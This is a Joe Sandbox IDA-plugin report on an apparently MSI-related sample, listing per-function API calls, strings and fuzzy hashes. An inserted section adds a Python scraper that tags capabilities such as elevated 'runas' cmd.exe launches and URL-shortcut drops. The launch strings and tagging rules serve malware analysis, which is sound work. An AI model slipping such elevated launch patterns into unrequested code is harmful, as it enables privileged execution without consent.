                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _strrchr
                                                                        • String ID:
                                                                        • API String ID: 3213747228-0
                                                                        • Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                        • Instruction ID: c81336c63611411b1cf2c37b174db4b927d9c79064da75f0a59586bc32b4a5a6
                                                                        • Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                        • Instruction Fuzzy Hash: 80B149729002559FDB158F68C891FEEBBE6EF69350F5481EAE805AB341D3349D81CBA0
                                                                        APIs
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00B20738
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B207B3
                                                                        • FindClose.KERNEL32(00000000), ref: 00B207D5
                                                                        • FindClose.KERNEL32(00000000), ref: 00B207F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID:
                                                                        • API String ID: 1164774033-0
                                                                        • Opcode ID: 086176f69beb42fe116f1b31c02b7316587cb5c75db654465948c1dc36bc27d9
                                                                        • Instruction ID: 4fa6350e170b80b229a9e9d86632dabdb704c8803418fee5e1053f9d9fb79fa4
                                                                        • Opcode Fuzzy Hash: 086176f69beb42fe116f1b31c02b7316587cb5c75db654465948c1dc36bc27d9
                                                                        • Instruction Fuzzy Hash: 89417271910239AFDB20FF64EC89EAEB7F9EB85314F1441D5E40997192EA309E85CF50
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B083C9
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00B08495
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B084B5
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00B084BF
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: 34a95a0338cccef838c2212a43f2fe154596adcc1975d1600576f252e8ba2915
                                                                        • Instruction ID: 8ee33362575cb7027b1b96f634e7c543d3b903ec63a3bc888580c8569f427e36
                                                                        • Opcode Fuzzy Hash: 34a95a0338cccef838c2212a43f2fe154596adcc1975d1600576f252e8ba2915
                                                                        • Instruction Fuzzy Hash: 9B31E975D053199BDB20DF64D9497CDBBF8AF14300F1041EAE449AB290EB715B85CF45
                                                                        APIs
                                                                        • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,00AE3270,?), ref: 00AF2176
                                                                        • FormatMessageA.KERNEL32(00001300,00000000,1816BA6E,00000000,00000000,00000000,00000000,?,?,?,00AE3270,?), ref: 00AF2198
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: FormatInfoLocaleMessage
                                                                        • String ID: !x-sys-default-locale
                                                                        • API String ID: 4235545615-2729719199
                                                                        • Opcode ID: ed6d5df81f872fc0e713640622d0122921145c0b408e6b9a26b440426f9f54d3
                                                                        • Instruction ID: 088b28f069da66a38b2544e18469822c2e3f846e21c8e1109aaa385ab5117e2f
                                                                        • Opcode Fuzzy Hash: ed6d5df81f872fc0e713640622d0122921145c0b408e6b9a26b440426f9f54d3
                                                                        • Instruction Fuzzy Hash: 6FE06DB6150118BFFB149FA0CC0BEBF7BADEB04791F004114BA01E2190E6B0AE00CBA0

                                                                        Control-flow Graph
                                                                        [Control-flow graph of the function at 00AE7660 (basic blocks 00AE7660 to 00AE7AE8); the executed / not-executed colouring of the blocks is not recoverable as text. Nodes in the graph call GetWindowsDirectoryW, GetForegroundWindow, ShellExecuteExW, GetModuleHandleW, GetProcAddress, AllowSetForegroundWindow, Sleep, EnumWindows, BringWindowToTop, WaitForSingleObject, GetExitCodeProcess, GetWindowThreadProcessId and GetWindowLongW. The listed edges show that both ShellExecuteExW blocks (00AE78BD and 00AE78ED) flow into block 00AE7912, from which the AllowSetForegroundWindow path, the Sleep / EnumWindows / BringWindowToTop loop and finally the WaitForSingleObject / GetExitCodeProcess blocks are reached.]
                                                                        APIs
                                                                        • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 00AE781F
                                                                        • GetForegroundWindow.USER32(?,?), ref: 00AE78A4
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AE78C1
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AE78FF
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00AE7942
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AE7949
                                                                        • AllowSetForegroundWindow.USER32(00000000), ref: 00AE7953
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00AE7973
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AE797A
                                                                        • Sleep.KERNEL32(00000064,?,?,?), ref: 00AE7997
                                                                        • EnumWindows.USER32(00AE7A90,?), ref: 00AE79B3
                                                                        • BringWindowToTop.USER32(?), ref: 00AE79C2
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00AE79DF
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00AE79EC
                                                                          • Part of subcall function 00AE7D30: CloseHandle.KERNEL32(?,1816BA6E,00000010,00000010,?,?), ref: 00AE7D72
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00AE7A9C
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AE7AB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Handle$AddressExecuteForegroundModuleProcProcessShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                        • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                        • API String ID: 1023610922-986041216
                                                                        • Opcode ID: 7d267960365f14325ddd89ec92a440e1be81b1ccd6a10e2f0e5ca63555df9a23
                                                                        • Instruction ID: 6279d254d588ba834df51cbc7ca53f392a5b6036b1940273ee68762549517e5e
                                                                        • Opcode Fuzzy Hash: 7d267960365f14325ddd89ec92a440e1be81b1ccd6a10e2f0e5ca63555df9a23
                                                                        • Instruction Fuzzy Hash: 48E19171A04249DFDB10DFA9C988AAEBBF5FF14310F248169E515EB2A1DB30DE45CB60
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AE880D
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AE8860
                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE886F
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AE888B
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE896B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE8977
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE89B3
                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE89D2
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE89EF
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE8A83
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00AE8ACE
                                                                        • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00AE8B1C
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE8B4B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                        • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                        • API String ID: 2199533872-3004881174
                                                                        • Opcode ID: ff6f316d327a387bd74b3669b432e2c2388805dcd4d7c4c9b9fafc06d910fbff
                                                                        • Instruction ID: b93a4f385d0950dcc2471f535819ed6d7d335e2e86d3bf093f422f023c994c1e
                                                                        • Opcode Fuzzy Hash: ff6f316d327a387bd74b3669b432e2c2388805dcd4d7c4c9b9fafc06d910fbff
                                                                        • Instruction Fuzzy Hash: A6C136719002859FEB20DF69CC45BBFBBF5EF54700F244169E908AB2D1EB788A05C7A1
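The two listings just above, the cmd.exe launcher that carries the open and runas verbs (function 00AE7660) and the [InternetShortcut] writer that ends in ShellExecuteW, are the kind of per-function block an analyst ends up scraping out of these reports by hand. The following is an added example, not Joe Sandbox code and not code from the sample: a small Python scraper for this block layout that recovers each function's APIs, strings and fuzzy hash, then tags a few capabilities with rules that are the example's own heuristics rather than sandbox signatures. The excerpt it parses is constructed from lines shown on this page, trimmed to what the parser needs; the regexes, the record layout and the tag names are assumptions made here.

```python
"""Scrape Joe Sandbox per-function listings and tag capabilities.

Example added to this report page, not Joe Sandbox code: it parses the
"APIs" / "Similarity" blocks printed above into one record per function and
applies a few rules that are this example's own heuristics, not signatures.
"""
import re
from dataclasses import dataclass, field

# API bullets: "• GetProcAddress.KERNEL32(00000000), ref: 00AE7949", the
# subcall form "• Part of subcall function 00AE7D30: CloseHandle.KERNEL32(?), ref: ..."
# and the argument-less form "• IsDebuggerPresent.KERNEL32 ref: 00B08495".
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Za-z0-9_\-]+)(?:\(|\s+ref:)"
)
# "key: value" bullets (String ID, Opcode ID, Instruction Fuzzy Hash, ...).
# Strings-section bullets such as "• kernel32.dll, xrefs: 00B0778C" have no
# "key:" prefix and are deliberately skipped by this scraper.
FIELD_LINE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # (api, module, from_subcall)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # Opcode ID, fuzzy hashes, ...


def parse_listing(text):
    """One FunctionRecord per block; 'Instruction Fuzzy Hash' is the last
    field Joe Sandbox prints per function, so that line closes a record."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["api"], m["mod"], m["sub"] is not None))
            continue
        m = FIELD_LINE.match(line)
        if not m:
            continue                    # section headers, legend, dump sources
        key, val = m["key"].strip(), m["val"].strip()
        if key == "String ID":
            # Joe Sandbox joins strings with '$'. A literal '$' inside a string
            # (e.g. the URL-encoding set "-_.~!*'();:@&=+$,/?#[]" on this page)
            # is therefore ambiguous; treat the split as a heuristic.
            cur.strings = [s for s in val.split("$") if s]
        elif key != "API ID":           # API ID is derivable from the API lines
            cur.fields[key] = val
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records


def _apis(rec):
    return {api for api, _, _ in rec.apis}


RULES = {   # this example's heuristics, keyed by tag name
    "elevated-launch": lambda r: bool(_apis(r) & {"ShellExecuteExW", "ShellExecuteW"})
    and "runas" in r.strings,
    "cmd-interpreter": lambda r: any(
        "cmd.exe" in s.lower() or s.startswith("/C") for s in r.strings),
    "url-shortcut-drop": lambda r: any("[InternetShortcut]" in s for s in r.strings),
    "foreground-steal": lambda r: bool(
        _apis(r) & {"AllowSetForegroundWindow", "BringWindowToTop"}),
}


def tag(rec):
    """Sorted names of the rules a record satisfies."""
    return sorted(name for name, pred in RULES.items() if pred(rec))


# Constructed excerpt in the report's layout: two functions listed on this
# page, trimmed to the lines the parser needs.
SAMPLE = r'''
APIs
• GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 00AE781F
• ShellExecuteExW.SHELL32(?), ref: 00AE78C1
• AllowSetForegroundWindow.USER32(00000000), ref: 00AE7953
• BringWindowToTop.USER32(?), ref: 00AE79C2
  • Part of subcall function 00AE7D30: CloseHandle.KERNEL32(?,1816BA6E,00000010,00000010,?,?), ref: 00AE7D72
Similarity
• String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
• Instruction Fuzzy Hash: 48E19171A04249DFDB10DFA9C988AAEBBF5FF14310F248169E515EB2A1DB30DE45CB60
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00AE880D
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AE896B
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00AE8ACE
Similarity
• String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
• Instruction Fuzzy Hash: A6C136719002859FEB20DF69CC45BBFBBF5EF54700F244169E908AB2D1EB788A05C7A1
'''
```

Feeding a saved text copy of the whole report to parse_listing instead of SAMPLE yields one record per function, and tag(record) then picks out the two blocks above as the elevated launcher and the shortcut writer. The weak spot is the $-joined String ID field: Joe Sandbox gives no escaping for a literal $, so anything that depends on exact string boundaries should go back to the Strings section with its xrefs rather than the Similarity summary.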
                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00B44AF8,00000FA0,?,?,00B07747), ref: 00B07775
                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00B07747), ref: 00B07780
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00B07747), ref: 00B07791
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B077A3
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B077B1
                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B07747), ref: 00B077D4
                                                                        • DeleteCriticalSection.KERNEL32(00B44AF8,00000007,?,?,00B07747), ref: 00B077F0
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00B07747), ref: 00B07800
                                                                        Strings
                                                                        • kernel32.dll, xrefs: 00B0778C
                                                                        • SleepConditionVariableCS, xrefs: 00B0779D
                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B0777B
                                                                        • WakeAllConditionVariable, xrefs: 00B077A9
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                        • API String ID: 2565136772-3242537097
                                                                        • Opcode ID: 2625e5f1651777f4493d57fad2dbc7c60a93c8e94806b3306b52e4aade89de19
                                                                        • Instruction ID: b8df5ff5357c7172862b00ece129e6087e82cfaaaa3259733b90c3f33e5081fe
                                                                        • Opcode Fuzzy Hash: 2625e5f1651777f4493d57fad2dbc7c60a93c8e94806b3306b52e4aade89de19
                                                                        • Instruction Fuzzy Hash: 1C01B135B80711ABD7312B75BC0DF267AD8EB46B82B0500A5F815E35B0DFB0DD1286A5
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000018,1816BA6E,?,00000000), ref: 00AEF076
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEF0B3
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEF11D
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEF2B9
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEF376
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00AEF39E
                                                                         Memory Dump Source
                                                                         • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name$false$true
                                                                        • API String ID: 975656625-1062449267
                                                                        • Opcode ID: f31e28aa0f3b918bb08a767952b270c866afe601bc79bd29c186fecfc0404851
                                                                        • Instruction ID: e36f9f34a12130d7ccb2a58f7d994e5791e82b219a67851e1fd66c7bd43e50e1
                                                                        • Opcode Fuzzy Hash: f31e28aa0f3b918bb08a767952b270c866afe601bc79bd29c186fecfc0404851
                                                                        • Instruction Fuzzy Hash: 6AB183B1D00388DEEB20DFA5C945BDEBBF4FF14304F1481A9E558AB282E7759A48CB51
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,1816BA6E,?,00000000), ref: 00AE6AC2
                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000,?,1816BA6E,?,00000000), ref: 00AE6AE3
                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,1816BA6E,?,00000000), ref: 00AE6B16
                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,1816BA6E,?,00000000), ref: 00AE6B27
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6B45
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6B61
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6B89
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6BA5
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6BC3
                                                                        • CloseHandle.KERNEL32(00000000,?,1816BA6E,?,00000000), ref: 00AE6BDF
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle$Process$OpenTimes
                                                                        • String ID:
                                                                        • API String ID: 1711917922-0
                                                                        • Opcode ID: 1067b0d4f45e45bf5e8b461476b9204d7dd8ae29d93d3dc7fbc6484eb156a024
                                                                        • Instruction ID: 27c71ead79fe89eacf90e6cb90ec948efb5a327518bc2133c27fa4cb475414eb
                                                                        • Opcode Fuzzy Hash: 1067b0d4f45e45bf5e8b461476b9204d7dd8ae29d93d3dc7fbc6484eb156a024
                                                                        • Instruction Fuzzy Hash: 155157B1E01258EBDB10CF99C984BEEFBF5AB58724F244259E914B72D0C7B45D01CBA8
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B0083B
                                                                          • Part of subcall function 00AF780A: __EH_prolog3.LIBCMT ref: 00AF7811
                                                                          • Part of subcall function 00AF780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AF781B
                                                                          • Part of subcall function 00AF780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF788C
                                                                         Memory Dump Source
                                                                         • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1538362411-2891247106
                                                                        • Opcode ID: 5b6ee4370f3329786413148d3ec8ca286e1f74bd7f4d10e440a50d4f1142abc8
                                                                        • Instruction ID: ca0cbac42ad7b238ba96584bdb6ec11346dd70faf41d0941398747d82f142db0
                                                                        • Opcode Fuzzy Hash: 5b6ee4370f3329786413148d3ec8ca286e1f74bd7f4d10e440a50d4f1142abc8
                                                                        • Instruction Fuzzy Hash: 12C1917255010AAFDB18EF98C995FFE7FE8FB05304F144599FA46A7291D630DA00CB60
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B059E9
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5BD
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5E0
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC608
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC6A7
                                                                         Memory Dump Source
                                                                         • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1383202999-2891247106
                                                                        • Opcode ID: 0e76660da326ba8974f6b53de56783b1b794a4b321ba706ff424fd78966904f9
                                                                        • Instruction ID: 5df55335d9ec91d803441943ce911c38a0ac10c4a6f7e21d8f116cf73b0aa4ae
                                                                        • Opcode Fuzzy Hash: 0e76660da326ba8974f6b53de56783b1b794a4b321ba706ff424fd78966904f9
                                                                        • Instruction Fuzzy Hash: 44C14276500609AFDB38DF58C999DFB7FE8EB05300F14469AFA06A66D1D630DA10CF60
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B00C2B
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB52D
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB550
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB578
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB617
                                                                         Memory Dump Source
                                                                         • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
